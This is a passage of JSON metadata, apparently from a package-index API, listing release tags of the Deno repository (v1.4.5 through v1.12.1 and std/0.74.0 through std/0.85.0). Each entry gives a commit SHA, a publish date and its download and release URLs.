"download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/man